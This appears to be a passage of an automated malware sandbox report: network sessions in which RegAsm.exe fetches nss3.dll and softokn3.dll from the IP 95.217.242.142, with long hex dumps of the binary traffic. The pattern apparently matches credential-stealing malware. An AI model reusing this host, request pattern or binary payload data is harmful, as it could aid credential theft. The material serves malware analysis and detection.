                                                                                                                                                                                                                                                            2024-04-29 20:13:23 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                                                                                                                                                                                            Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                                                                                                                                                                                            2024-04-29 20:13:23 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                                                                                                                                                                                            Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                                                                                                                                                                                            2024-04-29 20:13:23 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                                                                                                                                                                                            Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                                                                                                                                                                                            2024-04-29 20:13:23 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                                                                                                                                                                                            Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                                                                                                                                                                                            2024-04-29 20:13:23 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                                                                                                                                                                                            Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            24192.168.2.44976895.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:25 UTC218OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:26 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:25 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 2046288
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            ETag: "6315a9f4-1f3950"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            2024-04-29 20:13:26 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                                                            2024-04-29 20:13:26 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                                                                                                                                                                                            Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                                                                                                                                                                                            2024-04-29 20:13:26 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                                                                                                                                                                                                            Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                                                            2024-04-29 20:13:26 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                                                                                                                                                                                            Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                                                                                                                                                                                                            2024-04-29 20:13:26 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                                                                                                                                                                                            Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                                                                                                                                                                                            2024-04-29 20:13:26 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                                                                                                                                                                                                            Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                                                                                                                                                                                            2024-04-29 20:13:26 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                                                                                                                                                                                            Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                                                                                                                                                                                            2024-04-29 20:13:26 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                                                                                                                                                                                            Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                                                                                                                                                                                            2024-04-29 20:13:26 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                                                                                                                                                                                            Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                                                                                                                                                                                            2024-04-29 20:13:26 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                                                                                                                                                                                            Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            25192.168.2.44976995.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:28 UTC222OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:29 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:28 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 257872
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            ETag: "6315a9f4-3ef50"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            2024-04-29 20:13:29 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                                            2024-04-29 20:13:29 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                                                                                                                                                                                            Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                                                                                                                                                                                            2024-04-29 20:13:29 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                                                                                                                                                                                            Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                                                                                                                                                                                                            2024-04-29 20:13:29 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
